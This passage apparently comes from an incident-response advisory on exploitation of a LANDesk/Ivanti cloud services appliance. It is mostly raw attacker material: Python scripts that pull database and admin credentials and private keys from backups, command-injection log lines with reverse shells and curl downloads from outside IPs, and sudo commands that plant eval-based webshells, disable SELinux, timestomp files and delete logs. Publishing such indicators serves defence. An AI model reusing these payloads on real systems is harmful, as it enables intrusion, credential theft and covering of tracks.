{import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin'\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') } { import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='service'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'service'\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') } import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') { import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}',lockoutalert=0,attempts=0 where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0] p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip() v = p.split(':') k = os.popen('base 64 -w0 root/.certs/{}.key'.format(v[1])).read() set_msg(dbpwd, "PASSWORD", p+'||'+k) time.sleep(30) set_msg(dbpwd) } { import os, re, base64, time def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}',lockoutalert=0 where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) os.chdir("/tmp") d = "/backups" try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0] os.system('''export PGPASSWORD={};echo "delete from user_info where runas='Nobody'"|psql -d brokerdb -U gsbadmin'''.format(dbpwd)) if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} '{}' '{}' '{}' root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') } { import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0] os.system('''export PGPASSWORD={};echo "delete from user_info where runas='Nobody'"|psql -d brokerdb -U gsbadmin'''.format(dbpwd)) if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') } Decoded datetime.php 'timezone' Exploit base64 Scripts {Sep 5 01:09:59 REDACTED gsb[996]: /etc/php.ini rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo "update user_info set organization='||/usr/bin/echo import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') | /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin;' (1) } { Sep 5 01:47:01 REDACTED gsb[2599]: /etc/php.ini rewritten with new timezone: ';/usr/bin/echo import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') | /usr/bin/base64 -d | python;' (1) } { Sep 5 02:14:08 REDACTED gsb[1273]: /etc/php.ini rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo "update user_info set organization='||/usr/bin/echo import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') | /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin;' (1) } { Sep 5 22:22:06 REDACTED gsb[9367]: /etc/php.ini rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo "update user_info set organization='||/usr/bin/echo import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') | /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin;' (1) } { Sep 6 02:39:11 REDACTED gsb[21266]: /etc/php.ini rewritten with new timezone: ';/usr/bin/echo import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') | /usr/bin/base64 -d | python;' (1) } { Sep 6 03:03:44 REDACTED gsb[11427]: /etc/php.ini rewritten with new timezone: ';bash /tmp/Xa27efd2.tmp;' (1) } { Sep 8 05:18:35 REDACTED gsb[5132]: /etc/php.ini rewritten with new timezone: ';/sbin/backuptool --backup;' (1) } { Sep 8 05:19:34 REDACTED gsb[5325]: /etc/php.ini rewritten with new timezone: ';/usr/bin/echo import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') | /usr/bin/base64 -d | python;' (1) } { Sep 8 10:37:35 REDACTED gsb[6196]: /etc/php.ini rewritten with new timezone: ';nc REDACTED 80 -ssl -e /bin/bash;' (1) } { Sep 8 10:40:38 REDACTED gsb[8758]: /etc/php.ini rewritten with new timezone: ';curl https://gggg.oyr2ohrm.eyes.sh /;' (1) } { Sep 8 10:41:35 REDACTED gsb[7475]: /etc/php.ini rewritten with new timezone: ';curl 98.98.54.209/a.sh -o /dev/shm/a.sh ;' (1) } { Sep 8 13:10:37 REDACTED gsb[22555]: /etc/php.ini rewritten with new timezone: ';nc REDACTED 80 --ssl -e /bin/bash;' (1) } { Sep 8 13:21:06 REDACTED gsb[24954]: /etc/php.ini rewritten with new timezone: ';nc REDACTED 80 --ssl -e /bin/bash;' (1) } { Sep 8 20:23:14 REDACTED gsb[1899]: /etc/php.ini rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo "update user_info set organization='||/usr/bin/echo import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') | /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin;' (1) } { Sep 10 04:36:30 REDACTED gsb[16012]: /etc/php.ini rewritten with new timezone: ';/usr/bin/echo python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("45.33.101.53 ",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'== | /usr/bin/base64 -d | /bin/bash;' (1) } { Sep 10 11:48:32 csa gsb[6829]: /etc/php.ini rewritten with new timezone: ';/bin/ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("156.234.193.18",44345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);';' (1) } { Sep 10 05:33:42 REDACTED gsb[17292]: /etc/php.ini rewritten with new timezone: ';/usr/bin/echo import os, re, time os.chdir("/tmp") d = "/backups/backup-09-01-2024_010101.tar.gz" with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if os.path.exists(d): os.system("tar zxf {}".format(d)) pwd = os.popen("export PGPASSWORD={};echo SELECT username,passwd FROM user_info | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().strip() p = pwd.split(':') k = os.popen("cat root/.certs/{}.0".format(p[1])).read().strip() os.system('''export PGPASSWORD={};echo "INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (1, '{}', '1', '{}', '2024-03-13 05:10:16.926012')"|psql -d brokerdb -U gsbadmin'''.format(dbpwd, k[0:200], k[200:700])) os.system('''export PGPASSWORD={};echo "INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (2, '{}', '2', '{}', '2024-03-13 05:10:16.926012')"|psql -d brokerdb -U gsbadmin'''.format(dbpwd, k[700:900], k[900:])) os.system('''export PGPASSWORD={};echo "INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (3, '{}', '3', '{}', '2024-03-13 05:10:16.926012')"|psql -d brokerdb -U gsbadmin'''.format(dbpwd, pwd[0:200], pwd[200:700])) time.sleep(60) os.system('''export PGPASSWORD={};echo "DELETE FROM blockedcerts"|psql -d brokerdb -U gsbadmin'''.format(dbpwd)) os.system("rm -rdf *;rm -rf *")== | /usr/bin/base64 -d | python;' (1) } Appendix B: Sudo Commands See Table 14 for a list of known sudo commands executed by the threat actors. Command Use sudo: nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/opt/landesk/ldms/LDClient/ldpclient -i ;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo "update user_info set organization='||/usr/bin/echo aW1wb3J0IG9zLCByZSwgYmFzZTY0LCB0aW1lCm9zLmNoZGlyKCIvdG1wIikKZCA9ICIvYmFja3VwcyIKZGVmIHNldF9tc2cocCwgdD0nJywgbT0nJyk6CiAgICBpZiB0IGFuZCBtOgogICAgICAgIG1zZyA9ICdBQXt9Ont9QkInLmZvcm1hdCh0LCBiYXNlNjQuYjY0ZW5jb2RlKG0uZW5jb2RlKCkpLmRlY29kZSgpKQogICAgZWxzZToKICAgICAgICBtc2cgPSAnJwogICAgb3Muc3lzdGVtKCcnJ2V4cG9ydCBQR1BBU1NXT1JEPXt9O2VjaG8gInVwZGF0ZSB1c2VyX2luZm8gc2V0IG9yZ2FuaXphdGlvbj0ne30nIHdoZXJlIHVzZXJuYW1lPSdhZG1pbicifHBzcWwgLWQgYnJva2VyZGIgLVUgZ3NiYWRtaW4nJycuZm9ybWF0KHAsIG1zZykpCnRyeToKICAgIHIgPSBtYXgoW29zLnBhdGguam9pbihkLCBmKSBmb3IgZiBpbiBvcy5saXN0ZGlyKGQpIGlmIG9zLnBhdGguaXNmaWxlKG9zLnBhdGguam9pbihkLCBmKSldLCBrZXk9b3MucGF0aC5nZXRtdGltZSkKZXhjZXB0OgogICAgciA9IE5vbmUKd2l0aCBvcGVuKCIvb3B0L2xhbmRlc2svYnJva2VyL2Jyb2tlci5jb25mIikgYXMgZjoKICAgIGRicHdkID0gcmUuZmluZGFsbCgiUEdTUUxfUFc9KC4qKSIsIGYucmVhZCgpKVswXQppZiByOgogICAgcCA9IG9zLnBvcGVuKCJleHBvcnQgUEdQQVNTV09SRD17fTtlY2hvIFNFTEVDVCBwYXNzd2QgRlJPTSB1c2VyX2luZm8gV0hFUkUgdXNlcm5hbWU9XFwnYWRtaW5cXCcgfCBwc3FsIC1kIGJyb2tlcmRiIC1VIGdzYmFkbWluIC1oIGxvY2FsaG9zdCIuZm9ybWF0KGRicHdkKSkucmVhZCgpLnNwbGl0KCJcbiIpWy00XS5zdHJpcCgpLnNwbGl0KCc6JykKICAgIG9zLnN5c3RlbSgidGFyIHp4dmYge30iLmZvcm1hdChyKSkKICAgIHdoaWxlIFRydWU6CiAgICAgICAgZm9yIGYgaW4gb3MubGlzdGRpcignLicpOgogICAgICAgICAgICBpZiByZS5tYXRjaCgicGhwXHd7Nn0iLCBmKToKICAgICAgICAgICAgICAgIG9zLmNobW9kKGYsIDBvNzc3KQogICAgICAgICAgICAgICAgbSA9IG9zLnBvcGVuKCIuL3t9IHt9IHt9IHt9IHJvb3QvLmNlcnRzL3t9LmtleSB7fSIuZm9ybWF0KGYsIHBbNF0sIHBbNV0sIHBbNl0sIHBbMV0sIHBbMV0pKS5yZWFkKCkuc3RyaXAoKQogICAgICAgICAgICAgICAgaWYgbToKICAgICAgICAgICAgICAgICAgICBzZXRfbXNnKGRicHdkLCAiUEFTU1dPUkQiLCBtKQogICAgICAgICAgICAgICAgICAgIHRpbWUuc2xlZXAoMjQwKQogICAgICAgICAgICAgICAgICAgIHNldF9tc2coZGJwd2QpCiAgICAgICAgICAgICAgICAgICAgZXhpdCgpCmVsc2U6CiAgICBzZXRfbXNnKGRicHdkLCAnRVJST1InLCAnTk8gQkFDS1VQJykKICAgIAogICAgCg== | /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin; Updates the “organization” field of the “admin” account in the PGSQL database with python script decoded from base64. The python script decompresses the latest backup of the PGSQL database and extracts the password for the gsbadmin account to access the database. nobody : user NOT in sudoers ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=/sbin/setenforce 0 Temporarily disables SELinux. sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo REDACTED_BASE64_PASSWORD | base64 >/opt/landesk/broker/webroot/gsb/site.cnf Exfiltrates credentials and places them in a site.cnf webfile. sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo PD9waHAgZXZhbCgkX1BPU1RbImNiNzg2OGM0NjA zNTQ4NTdiNzE5MjA0ZTI3NjZlZGJlIl0pOw== | base64 -d >/opt/landesk/broker/webroot/gsb/view.php Creates a webshell at view.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/tripwire --update ;/usr/bin/echo ZWNobyAiPD9waHAgc3lzdGVtKCcvYmluL3N1ZG8gJy4Gq FwkX1JFUVVFU1RbJ2EnXSk7IiA+IC9vcHQvbGFuZGVzay9icm 9rZXIvd2Vicm9vdC9nc2IvaGVscC5waHA= | /usr/bin/base64 -d | /bin/bash; Creates a webshell at help.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/setPhpTimeZone($TIMEZONE)/\/\/ setPhpTimeZone()/g' /opt/landesk/broker/webroot/gsb/DateTimeTab.php Comments out the function setPhpTimeZone in DateTimeTab.php that logs the full exploit command. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/setSystemTimeZone( $TIMEZONE )/\/\/ setSystemTimeZone( $TIMEZONE )/g' /opt/landesk/broker/webroot/gsb/DateTimeTab.php Comments out the vulnerable function setSystemTimeZone in DateTimeTab.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/GSB main page/GSB main page\neval($_POST["in39112cnnpkyc1os01q34gp6r60akgi"])\;/g' /opt/landesk/broker/webroot/client/index.php Adds a webshell into index.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/$canvas_height = 600;/$canvas_height = 600;\n\teval($_POST["in39112cnnpkyc1os01q34gp6r60akgi"]);/' /opt/landesk/broker/webroot/gsb/style.php Adds a webshell into style.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/client/index.php Timestomping attempt to change the access and modification of time of index.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/style.php Timestomping attempt to change the access and modification time of style.php sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/DateTimeTab.php Timestomping attempt to change the access and modification time of DateTimeTab.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/help.php Timestomping attempt to change the access and modification time of help.php sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /var/log/messages Removes evidence. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/site.cnf Removes site.cnf file (exfiltrated credentials). sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/client/client.php Removes one of the original webshells. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm 